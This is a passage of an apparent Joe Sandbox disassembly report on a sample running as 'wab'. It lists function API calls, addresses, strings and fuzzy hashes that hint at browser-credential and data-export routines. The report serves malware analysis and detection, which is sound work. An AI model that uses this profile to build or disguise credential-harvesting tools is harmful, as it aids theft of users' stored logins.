                                          • wcsrchr.MSVCRT ref: 00411B14
                                          • wcscat.MSVCRT ref: 00411B2E
                                          Strings
                                          Similarity
                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                          • String ID: AE$.cfg$General$EA
                                          • API String ID: 776488737-1622828088
                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                          APIs
                                          • memset.MSVCRT ref: 0040D8BD
                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                          • memset.MSVCRT ref: 0040D906
                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                          Strings
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                          • String ID: sysdatetimepick32
                                          • API String ID: 1028950076-4169760276
                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: -journal$-wal
                                          • API String ID: 438689982-2894717839
                                          • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                          • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                          Similarity
                                          • API ID: Item$Dialog$MessageSend
                                          • String ID:
                                          • API String ID: 3975816621-0
                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                          APIs
                                          • _wcsicmp.MSVCRT ref: 00444D09
                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                          • _wcsicmp.MSVCRT ref: 00444D33
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                          Strings
                                          Similarity
                                          • API ID: _wcsicmp$wcslen$_memicmp
                                          • String ID: .save$http://$https://$log profile$signIn
                                          • API String ID: 1214746602-2708368587
                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                          APIs
                                          Similarity
                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                          • String ID:
                                          • API String ID: 2313361498-0
                                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                          • GetWindow.USER32(00000000), ref: 00405F80
                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                          Similarity
                                          • API ID: Window$ItemMessageRectSend$Client
                                          • String ID:
                                          • API String ID: 2047574939-0
                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                          APIs
                                          Similarity
                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                          • String ID:
                                          • API String ID: 4218492932-0
                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                          APIs
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                          • memcpy.MSVCRT ref: 0044A8BF
                                          • memcpy.MSVCRT ref: 0044A90C
                                          • memcpy.MSVCRT ref: 0044A988
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                          • memcpy.MSVCRT ref: 0044A9D8
                                          • memcpy.MSVCRT ref: 0044AA19
                                          • memcpy.MSVCRT ref: 0044AA4A
                                          Strings
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: gj
                                          • API String ID: 438689982-4203073231
                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                          • API String ID: 3510742995-2446657581
                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                          • memset.MSVCRT ref: 00405ABB
                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                          • SetFocus.USER32(?), ref: 00405B76
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscat
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 384018552-4153097237
                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                          • String ID: 0$6
                                          • API String ID: 2029023288-3849865405
                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                          APIs
                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                          • memset.MSVCRT ref: 00405455
                                          • memset.MSVCRT ref: 0040546C
                                          • memset.MSVCRT ref: 00405483
                                          • memcpy.MSVCRT ref: 00405498
                                          • memcpy.MSVCRT ref: 004054AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy$ErrorLast
                                          • String ID: 6$\
                                          • API String ID: 404372293-1284684873
                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                          • wcscpy.MSVCRT ref: 0040A0D9
                                          • wcscat.MSVCRT ref: 0040A0E6
                                          • wcscat.MSVCRT ref: 0040A0F5
                                          • wcscpy.MSVCRT ref: 0040A107
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                          • String ID:
                                          • API String ID: 1331804452-0
                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                          APIs
                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                          • String ID: advapi32.dll
                                          • API String ID: 2012295524-4050573280
                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                          APIs
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                          • <%s>, xrefs: 004100A6
                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3473751417-2880344631
                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscat$_snwprintfmemset
                                          • String ID: %2.2X
                                          • API String ID: 2521778956-791839006
                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscpy
                                          • String ID: dialog_%d$general$menu_%d$strings
                                          • API String ID: 999028693-502967061
                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memsetstrlen
                                          • String ID:
                                          • API String ID: 2350177629-0
                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                          • API String ID: 2221118986-1606337402
                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 265355444-0
                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                          APIs
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                          • memset.MSVCRT ref: 0040C439
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                          • _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                          • memset.MSVCRT ref: 0040C4D0
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                          • String ID:
                                          • API String ID: 1973883786-0
                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                          APIs
                                          • memset.MSVCRT ref: 004116FF
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2618321458-3614832568
                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                          APIs
                                          • memset.MSVCRT ref: 004185FC
                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@AttributesFilememset
                                          • String ID:
                                          • API String ID: 776155459-0
                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                          • malloc.MSVCRT ref: 00417524
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                          • String ID:
                                          • API String ID: 2308052813-0
                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                          APIs
                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
